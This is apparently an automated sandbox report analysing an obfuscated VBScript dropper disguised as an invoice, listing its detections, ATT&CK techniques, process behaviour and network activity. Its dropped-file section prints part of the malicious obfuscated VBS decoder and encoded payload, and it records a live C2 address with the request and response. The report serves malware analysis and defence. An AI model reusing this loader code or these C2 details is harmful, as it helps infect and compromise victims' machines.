
Automated Malware Analysis Report for Factura E 2903.Vbs

ID: 336297
Sample Name: factura_e_2903.vbs
Cookbook: default.jbs
Time: 18:49:12
Date: 05/01/2021
Version: 31.0.0 Red Diamond

Table of Contents

Table of Contents 2
Analysis Report factura_e_2903.vbs 4
Overview 4
General Information 4
Detection 4
Signatures 4
Classification 4
Startup 4
Malware Configuration 4
Yara Overview 4
Sigma Overview 4
Signature Overview 4
AV Detection: 5
Data Obfuscation: 5
Persistence and Installation Behavior: 5
Malware Analysis System Evasion: 5
HIPS / PFW / Protection Evasion: 5
Mitre Att&ck Matrix 5
Behavior Graph 6
Screenshots 6
Thumbnails 6
Antivirus, Machine Learning and Genetic Malware Detection 7
Initial Sample 7
Dropped Files 7
Unpacked PE Files 7
Domains 7
URLs 7
Domains and IPs 8
Contacted Domains 8
Contacted URLs 8
URLs from Memory and Binaries 8
Contacted IPs 8
Public 9
General Information 9
Simulations 10
Behavior and APIs 10
Joe Sandbox View / Context 10
IPs 10
Domains 10
ASN 10
JA3 Fingerprints 10
Dropped Files 11
Created / dropped Files 11
Static File Info 11
General 11
File Icon 11
Network Behavior 12
TCP Packets 12
HTTP Request Dependency Graph 12
HTTP Packets 12
Code Manipulations 13
Statistics 13
Behavior 13
System Behavior 13
Analysis Process: wscript.exe PID: 6772 Parent PID: 3472 14
Copyright null 2021 Page 2 of 15
General 14
File Activities 14
File Created 14
File Written 14
Registry Activities 14
Analysis Process: wscript.exe PID: 6820 Parent PID: 6772 15
General 15
File Activities 15
Disassembly 15
Code Analysis 15

Analysis Report factura_e_2903.vbs

Overview

General Information

Sample Name: factura_e_2903.vbs
Analysis ID: 336297
MD5: b5d602542a401e…
SHA1: a1a5fb11359fd6c…
SHA256: a1af774d09bdc8d…
Most interesting Screenshot: (image)

Detection

Score: 72
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for subm…
System process connects to netw…
VBScript performs obfuscated calls…
Queries sensitive BIOS Information…
Windows Shell Script Host drops VB…
Contains capabilities to detect virtua…
Creates a process in suspended mo…
Found WSH timer for Javascript or V…
Internet Provider seen in connection…
Java / VBScript file with very long s…
Monitors certain registry keys / valu…
Queries sensitive Operating System…
Tries to load missing DLLs
Uses a known web browser user age…

Classification

(Radar chart; only its labels survive the text extraction.) Categories: Ransomware, Miner, Spreading, Evader, Phishing, Exploiter, Banker, Spyware, Trojan / Bot, Adware. Legend: malicious, suspicious, clean.

Startup

System is w10x64
wscript.exe (PID: 6772 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\factura_e_2903.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    wscript.exe (PID: 6820 cmdline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

No Sigma rule has matched

Signature Overview

• AV Detection
• Networking
• System Summary
• Data Obfuscation
• Persistence and Installation Behavior
• Hooking and other Techniques for Hiding and Protection
• Malware Analysis System Evasion
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

AV Detection:

Multi AV Scanner detection for submitted file

Data Obfuscation:

VBScript performs obfuscated calls to suspicious functions

Persistence and Installation Behavior:

Windows Shell Script Host drops VBS files

Malware Analysis System Evasion:

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Mitre Att&ck Matrix

The matrix is reproduced here column by column (one tactic per line); the trailing numbers are the report's per-technique signature counts.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Windows Management Instrumentation 1 1; Scripting 2 2 1; PowerShell 1; At (Windows); Cron; Launchd
Persistence: DLL Side-Loading 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Privilege Escalation: Process Injection 1 1 1; DLL Side-Loading 1; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common
Defense Evasion: Masquerading 1; Virtualization/Sandbox Evasion 2; Process Injection 1 1 1; Scripting 2 2 1; Obfuscated Files or Information 1; DLL Side-Loading 1
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Query Registry 1; Security Software Discovery 2 1; Virtualization/Sandbox Evasion 2; File and Directory Discovery 1; System Information Discovery 1 1 2; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Command and Control: Ingress Tool Transfer 1; Non-Application Layer Protocol 2; Application Layer Protocol 1 2; Protocol Impersonation; Fallback Channels; Multiband Communication
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service

Behavior Graph

(Graph figure; only its legend and node labels survive the text extraction.)

Legend: ID: 336297, Sample: factura_e_2903.vbs, Startdate: 05/01/2021, Architecture: WINDOWS, Score: 72. Node types: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Is malicious, Internet, Number of created Registry Values, Number of created Files, Delphi, Java, .Net C# or VB.NET, C, C++ or other language.

Process chain:
wscript.exe (started; counters as extracted: 3, 2)
    dropped: C:\Users\Public\D68.vbs, ASCII
    started: wscript.exe (counter as extracted: 6)
        47.254.94.1, 49717, 80 (CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC, United States)

Signatures attached to the graph: Multi AV Scanner detection for submitted file; Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines); VBScript performs obfuscated calls to suspicious functions; Windows Shell Script Host drops VBS files; System process connects to network (likely due to code injection or exploit).

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label
factura_e_2903.vbs | 27% | Virustotal |

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source | Detection | Scanner | Label
47.254.94.1/m/t5o | 1% | Virustotal |
47.254.94.1/m/t5o | 0% | Avira URL Cloud | safe
47.254.94.1/t5o( | 0% | Avira URL Cloud | safe
47.254.94.1/ | 1% | Virustotal |
47.254.94.1/ | 0% | Avira URL Cloud | safe
47.254.94.1/aj32.phpi | 0% | Avira URL Cloud | safe
47.254.94.1/aj32.php | 0% | Avira URL Cloud | safe
47.254.94.1/t5oa | 0% | Avira URL Cloud | safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
47.254.94.1/aj32.php | true | Avira URL Cloud: safe | unknown

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
47.254.94.1/m/t5o | wscript.exe, 00000001.00000003.258669650.000001E94A921000.00000004.00000001.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
47.254.94.1/t5o( | wscript.exe, 00000001.00000003.269278795.000001E9483C5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
47.254.94.1/ | wscript.exe, 00000001.00000003.258669650.000001E94A921000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.253158535.000001E94A922000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.269278795.000001E9483C5000.00000004.00000001.sdmp | false | 1%, Virustotal; Avira URL Cloud: safe | unknown
47.254.94.1/aj32.phpi | wscript.exe, 00000001.00000003.269278795.000001E9483C5000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
47.254.94.1/t5oa | wscript.exe, 00000001.00000003.258669650.000001E94A921000.00000004.00000001.sdmp, wscript.exe, 00000001.00000003.259762258.000001E9483DF000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown

Contacted IPs

(World-map figure; legend only.) No. of IPs < 25% | 25% < No. of IPs < 50% | 50% < No. of IPs < 75% | 75% < No. of IPs

Public

IP | Domain | Country | ASN | ASN Name | Malicious
47.254.94.1 | unknown | United States | 45102 | CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC | true

General Information

Joe Sandbox Version: 31.0.0 Red Diamond
Analysis ID: 336297
Start date: 05.01.2021
Start time: 18:49:12
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 5m 2s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: factura_e_2903.vbs
Cookbook file name: default.jbs
Analysis system description: 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 19
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies: HCA enabled, EGA enabled, HDC enabled, AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal72.evad.winVBS@3/1@0/1
EGA Information: Failed
HDC Information: Failed
HCA Information: Successful, ratio: 100%
Number of executed functions: 0
Number of non-executed functions: 0
Cookbook Comments: Adjust boot time; Enable AMSI; Found application associated with file extension: .vbs
Warnings: Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, svchost.exe. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

No context

Domains

No context

ASN

Match: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Associated Sample Name / URL | Detection | Context
chacagrabsterston.top | malicious | 8.209.77.50
SecuriteInfo.com.Trojan.GenericKD.35624799.30696.exe | malicious | 47.57.139.0
sULC8E4jwy.exe | malicious | 47.91.78.102
://bit.ly/3mH4Noj | malicious | 8.208.92.142
https://bitly.com/2KZhv4G | malicious | 47.254.18.11
https://bit.ly/2L1Yyyv | malicious | 8.208.92.142
Fe8noCCZ5Z.exe | malicious | 47.91.95.232
DualSpace.apk | malicious | 47.74.171.2
p5fcw.info/HI12cu33F5 | malicious | 47.242.44.124
https://bit.ly/3pjmqfw | malicious | 8.208.92.142
https://bit.ly/3mH4A4v | malicious | 8.208.92.142
Order.doc | malicious | 47.74.93.57
https://bit.ly/34CiZca | malicious | 8.208.92.142
061.methodavoid.link/news | malicious | 8.208.92.142
https://bit.ly/3rsMNSv | malicious | 8.208.92.142
adjunto 86028707-97299.doc | malicious | 47.242.12.81
https://bit.ly/3hcmaML | malicious | 8.208.92.142
DOCUMENTO_MEDICO 047.doc | malicious | 47.242.12.81
bit.ly/2KrM6Ih | malicious | 8.208.92.142
p4fxv.info/D3c2Hp2HMI | malicious | 47.242.44.124

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\Public\D68.vbs

Process: C:\Windows\System32\wscript.exe
File Type: ASCII text, with very long lines, with no line terminators
Category: dropped
Size (bytes): 1413
Entropy (8bit): 5.229404960945602
Encrypted: false
SSDEEP: 24:/Vokz3RxUFl8V+VDuAl8TxXCBi7ECrs6M6gHfEpksjfBjim0x1WAW5sIscoDROAR:/PDRGu557Emsj/EpksjfBjin1WAWzmZT
MD5: 61132E385CD5755C0198948CAF89D8AD
SHA1: EBFFBF349BBE0C2E88A8EFCBA9808DAF10A06F88
SHA-256: 1F1BA4DC3FABC14DF1426C6FA1B8E3476FAB1520734463D8698B0CD1886CAE94
SHA-512: A8E3212091E60C9F51043CC0060C40C7ECFE3C2FE0F84275D83180B9C5803049F0EA9D817EFD1D600A36AB1B190F0602EABFE1377242BA4D04AA0ADBFB1E64CC
Malicious: true
Reputation: low
Preview: on error resume next:if ("dfg45gtsege4rtgdfg" <> "gtgedghdgdfgf") Then:w1=29:w1=w1+36:dim w2:w2=48:w2=w2+46:dim w3:w3=20:w3=w3+5:function chpped(bwdnru):muqhbif=w2:wjinnmrel=asc(Mid(bwdnru,1,1))-w1:bwdnru=Mid(bwdnru,2,Len(bwdnru)-1):qgsey="":while(Len(bwdnru)>0)qgsey=qgsey&(Chr((((asc(Mid(bwdnru,1,1))-w1))*w3+(asc(Mid(bwdnru,2,1))-w1)-wjinnmrel-muqhbif))):bwdnru=Mid(bwdnru,3,Len(bwdnru)-2):wEnd:chpped=qgsey:end function:dim wk1:wk1="DHYIOIHHVINICIIIHFEIKFVFMIKFXFNGFIKFWGIHTIMHVFMGYICHWFMIKFXFQFVFQFVFNFNFRGBGAGFIKFXGIGYICHWFMIKFXFQFWFQGXHXIHFMIKFXFNFRFVFNGFIKFYGIFGFGFGFGGFIQIBICIFHXFMGXHXIHFMIKFXFNGJFXFNIKFYGIIKFYFKFMGOIBILFMFMFMFMHTIMHVFMGYICHWFMIKFXFQFVFQFVFNFNFRGBGAFNFNFOFWGAFPFMHTIMHVFMGYICHWFMIKFXFQFWFQFVFNFNFRGBGAFNFRIKFWFRGEFYFNFNFNGFIKFXGIGYICHWFMIKFXFQFXFQGXHXIHFMIKFXFNFRFWFNGFIQGQIHHWGFIKFVGIIKFYGFHXIHHWFEHYIOIHHVINICIIIHGFIMHXINFEIIGTGIFEGOILHXHTINHXHBHUIDHXHVINFMFGFGGYICHVILIIIMIIHYINFSHKGYGXGTHGHGHCFGFGFNGFIIGTFSIIIJHXIHFEFGFGIJIIIMINFGFGFQFEFGFGIBININIJGFFTFTFYGCFSFWGAFYFS

Static File Info

General

File type: ASCII text, with CRLF line terminators
Entropy (8bit): 5.550794909925798
TrID: 669 Tracker Module (2002/1) 100.00%
File name: factura_e_2903.vbs
File size: 8775
MD5: b5d602542a401efb4ecf2bd860bcb9e9
SHA1: a1a5fb11359fd6c3d5cc27f96598b66e9de565cc
SHA256: a1af774d09bdc8d7e082023c41516fafb61134aa40dbcbe84588ac698181c392
SHA512: bb17af0ad5b22d589bbd6febb3d11477bf1d6b053c58264ad2cb35e72240d0e931cb848458d731a0d63bf48bc722249db7efae11591ec2792c32581dbf6edef1
SSDEEP: 192:mmnrFjA79ok/JW7DCN1KyFL/fXqMP8s9uLyggCG7bnVbC:mmndE/JW7DCrbFL/fXqMP8s9uLNgNVbC
File Content Preview: if ("s6e" <> "ke51") then..js62618 = "d7x84sjkg5ailqjo14 bb"..if ("rx0g0t5j5pude4lh6o" <> "ne3with3bodk63q3581 17h3") then..iqt80103 = "yp"..if ("teb53" <> "myc") then.. fi776292 = "fsaqgm43b"..if ("xjr14ohr4kd3piyf2kao" <> " hm6p") then..dx8pp6yyik14546 = "m

File Icon

Icon Hash: e8d69ece869a9ec4

Network Behavior

TCP Packets

Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 5, 2021 18:50:01.436784029 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.632327080 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.633233070 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.633608103 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.635174990 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.831398964 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.831434965 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.832021952 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.832062006 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.832098007 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.832134962 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.832169056 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:01.832199097 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.832215071 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.832221031 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:01.833219051 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:06.836005926 CET | 80 | 49717 | 47.254.94.1 | 192.168.2.5
Jan 5, 2021 18:50:06.836106062 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1
Jan 5, 2021 18:50:23.554717064 CET | 49717 | 80 | 192.168.2.5 | 47.254.94.1

HTTP Request Dependency Graph

47.254.94.1

HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.5 | 49717 | 47.254.94.1 | 80 | C:\Windows\System32\wscript.exe

Timestamp | kBytes transferred | Direction | Data
Jan 5, 2021 18:50:01.633608103 CET | 26 | OUT |
POST /aj32.php HTTP/1.1
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Language: en-us
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; /7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
Host: 47.254.94.1
Content-Length: 3
Connection: Keep-Alive
Cache-Control: no-cache

Jan 5, 2021 18:50:01.832021952 CET | 28 | IN |
HTTP/1.1 200 OK
Date: Tue, 05 Jan 2021 17:50:01 GMT
Server: Apache/2.4.29 (Ubuntu)
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 6155
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/; charset=UTF-8
Data Raw: 1f 8b 08 00 00 00 00 00 00 03 ed 3d 69 6e eb 3c 8c ff 07 98 3b cc 55 12 27 5a ec 24 b5 9d 66 bb ff 45 86 9b 56 4b 5e da f4 bd 87 0f 45 d0 c6 b1 25 6e a2 28 8a a2 64 63 cf f6 a4 ac 6d 6c 0f 9f b3 ed e1 ba 87 5f 83 bd da ce 36 f0 eb 04 bf ee 76 3c 7e 1c 4f f1 9f dd 61 4d 28 37 2a 0b a5 76 fa 6a 94 fe c4 6b 65 f5 19 fe ac 3e 14 cb bd b8 14 96 51 9d de ab ae 50 6a 30 16 7e b7 b6 31 1f a1 2c 5c 8c f0 b9 e8 56 3d d5 53 1f b4 56 0f bd d7 47 7d 80 6f 4b ff 77 ea 69 47 7d b4 67 f3 5c 82 6b 2e 80 7b 2b ec ce c1 2f 42 bf 01 64 0d bf ad be 6f 85 5c 84 b7 33 d6 3c 01 e2 13 4a 38 79 5d 75 6b ae 06 cb 60 8b 0d 70 ad ed d5 bc 08 f3 ce 5c 2b 70 3e f4 d3 41 50 0f 80 69 74 53 2b 69 86 50 d2 22 f6 4b a5 e4 05 34 64 d0 0d 6a 8c 70 5a 97 cc ce 80 cc ed c9 34 d8 32 76 ef 6b 5c 80 87 23 48 e7 50 ae a5 af 28 46 6a af 17 fc 3d f1 99 97 c4 ae dc 06 e6 cc 92 81 7a a4 d9 ae b4 3e ae 29 af 07 a0 e9 b2 0d 87 1e cc c9 74 db ea 98 b3 1e 4d bb 11 cf 0d 5a 67 11 0f c8 ec 64 0f f6 18 69 cc d5 18 f8 ff c4 fa 70 0d da a9 6f 70 7d 82 6f fe e0 3d 7c 7e d5 83 dc bf d2 b5 bb 77 37 3b be 07 3d bc 7c 5f 57 ee 1b 7f ff 4e f8 35 3c db 33 1c 7c 06 7d 10 74 59 68 eb a1 cc 83 9e df 4c 0b 7f 07 b8 6e a4 ee 95 7e 33 6d 48 a3 21 5e a8 0e c1 03 fc e6 28 df 08 db dd 6b 88 3f 2c 8f 3c df c1 f6 70 dd a3 7c f3 7d 2c 77 83 7a 77 3d 12 cc af e3 34 82 73 a4 3a c8 cf cd 74 8c 07 64 82 b0 6e 20 6b fc 2e e1 24 9e 89 5e ed bf b9 7c f8 e6 fb d6 3f 67 9c d6 f3 8b f8 18 ff 95 e5 09 d7 81 a6 1b c9 96 f9 0b f0 6b d7 0c cf e9 8b 91 3f 4d ed c2 32 39 10 ed cc 97 12 fa 06 d1 a9 29 ce 98 7e 77 bd 8e 8e 76 a6 2d ad f0 79 2d ca f4 4a f2 cf e5 97 e2 c0 fa 57 81 c3 b2 34 02 ab 15 1e 1e 13 de 98 df 4e 70 9c 84 a6 fb 84 76 96 d1 9c 2e f6 99 8e 29 91 d9 c1 f3 76 f5 f2 36 fc 9b 70 9e 23 dd 68 23 59 39 7d 98 93 59 27 f0 3f 04 c6 47 a4 9b a6 22 c7 4b 22 37 c7 6b c0 d5 b1 ee 89 0e d6 71 2b 91 e9 33 ea 23 c6 cb 8f db f2 26 f4 5c 66 e8 51 d4 ff 98 17 1b fd 76 72 6f b3 7e f2 13 32 51 f4 c7 65 2e 05 7c 5a 70 1a 4f cf 6d 63 3f 65 1c 3a a9 1f 78 ec 84 b6 d6 b7 fb bc ec 97 fa 8a 12 5a a7 7a c5 d7 2c 6b b2 cb 62 1f de 2b 4b bb 0a b7 ef af 44 47 8d 86 93 c8 51 cd e0 6b ab 36 87 c7 88 d0 5e 35 3e 59 9e 4b 32 65 1b 14 db be 58 47 73 3e df 6f 2b 14 d9 a8 d2 f8 31 c5 af 17 69 f0 63 7b 95 df 92 6d 6a 33 19 2c c9 f6 9d 76 e2 92 f0 17 6c 7c 5b a0 73 de 56 cf f3 ae 0b 36 28 ee bb ee bb d3 65 1d 70 36 dc 8d bd 47 df be 4c cf 29 ea 4b 07 29 d3 33 ef 1e bf ca f4 2c f8 14 31 4d 61 ac 7b 67 1f d6 99 ad ea 3c ec 54 ce f1 b8 51 c3 df ea e0 5f cc e1 ab d9 2b d1 7f c2 d1 8a 6d 99 b7 ff cb 7d 59 47 36 2a d8 a4 69 bf 72 df 75 7c ec 5f 9e 04 c7 7d 06 5f 5b 80 1f f7 db 4e df 22 3b f6 6e db f1 eb 7b ff fa de bf be f7 af ef fd eb 7b ff fa de bf be f7 af ef fd eb 7b ff fa de bf be f7 af ef fd eb 7b ff fa de bf be f7 af ef fd 1f f0 bd 79 1d d5 fd e9 bb c5 15 d4 9d 1d fd 0a f2 c3 36 76 34 17 db 59 6d 34 65 49 5c 68 5d 76 b4 0f 83 eb d9 2d d4 68 d4 80 6b b0 b6 37 47 b8 d3 d9 c6 b4 f6 02 57 3b 78 72 c3 cc 03 7c a6 af b6 85 7b 50 d2 95 0a cf 26 90 5d 09 9f 79 c1 b9 15 ca 1a 45 54 dd 42 c6 86 b1 71 c6 86 39 a6 19 1b ae 5e 05 4f e0 c0 ad fb 77 59 ad 06 d7 96 ed 99 25 10 78 e0 f2 16 b1 8d f0 f4 05 64 34 28 37 35 a8 ce de 28 13 a2 83 a7 1d 3c 1d 74 0b 70 ad fa f0 54 4c a5 34 aa 07 c3 72 92 2c 4a eb c3 2a bd 57 2f f9 e0
Data Ascii: =in<;U'Z$fEVK^E%n(dcml_6v<~OaM(7*vjke>QPj0~1,\V=SVG}oKwiG}g\k.{+/Bdo\3APitS +iP"K4djpZ42vk\#HP(Fj=z>)tMZgdipop}o=|~w7;=|_WN5<3|}tYhLn~3mH!^(k?,YK2eXGs>o+1ic{mj3,vl|[sV6(ep6GL )K)3,1Ma{g

Code Manipulations

Statistics

Behavior

• wscript.exe
• wscript.exe

System Behavior

Analysis Process: wscript.exe PID: 6772 Parent PID: 3472

General

Start time: 18:49:58
Start date: 05/01/2021
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\factura_e_2903.vbs'
Imagebase: 0x7ff670950000
File size: 163840 bytes
MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

File Created

Source: C:\Users\Public\D68.vbs
Access: read attributes | synchronize | generic write
Attributes: device
Options: synchronous io non alert | non directory file
Completion: success or wait
Count: 1
Address: 7FFA8A4B1571
Symbol: CreateFileW

File Written

Source: C:\Users\Public\D68.vbs
Offset: unknown
Length: 1413
Value: 6f 6e 20 65 72 72 6f 72 20 72 65 73 75 6d 65 20 6e 65 78 74 3a 69 66 20 28 22 64 66 67 34 35 67 74 73 65 67 65 34 72 74 67 64 66 67 22 20 3c 3e 20 22 67 74 67 65 64 67 68 64 67 64 66 67 66 22 29 20 54 68 65 6e 3a 77 31 3d 32 39 3a 77 31 3d 77 31 2b 33 36 3a 64 69 6d 20 77 32 3a 77 32 3d 34 38 3a 77 32 3d 77 32 2b 34 36 3a 64 69 6d 20 77 33 3a 77 33 3d 32 30 3a 77 33 3d 77 33 2b 35 3a 66 75 6e 63 74 69 6f 6e 20 63 68 70 70 65 64 28 62 77 64 6e 72 75 29 3a 6d 75 71 68 62 69 66 3d 77 32 3a 77 6a 69 6e 6e 6d 72 65 6c 3d 61 73 63 28 4d 69 64 28 62 77 64 6e 72 75 2c 31 2c 31 29 29 2d 77 31 3a 62 77 64 6e 72 75 3d 4d 69 64 28 62 77 64 6e 72 75 2c 32 2c 4c 65 6e 28 62 77 64 6e 72 75 29 2d 31 29 3a 71 67 73 65 79 3d 22 22 3a 77 68 69 6c 65 28 4c 65 6e 28 62 77 64
Ascii: on error resume next:if ("dfg45gtsege4rtgdfg" <> "gtgedghdgdfgf") Then:w1=29:w1=w1+36:dim w2:w2=48:w2=w2+46:dim w3:w3=20:w3=w3+5:function chpped(bwdnru):muqhbif=w2:wjinnmrel=asc(Mid(bwdnru,1,1))-w1:bwdnru=Mid(bwdnru,2,Len(bwdnru)-1):qgsey="":while(Len(bwd
Completion: success or wait
Count: 1
Address: 7FFA8A4BE70B
Symbol: WriteFile

Source File Path Offset Length Completion Count Address Symbol

Registry Activities

Source Key Path Name Type Data Completion Count Address Symbol

Analysis Process: wscript.exe PID: 6820 Parent PID: 6772

General

Start time: 18:49:59
Start date: 05/01/2021
Path: C:\Windows\System32\wscript.exe
Wow64 process (32bit): false
Commandline: 'C:\Windows\System32\WScript.exe' 'C:\Users\Public\D68.vbs'
Imagebase: 0x7ff670950000
File size: 163840 bytes
MD5 hash: 9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

File Activities

Source File Path Access Attributes Options Completion Count Address Symbol

Source File Path Offset Length Completion Count Address Symbol

Disassembly

Code Analysis
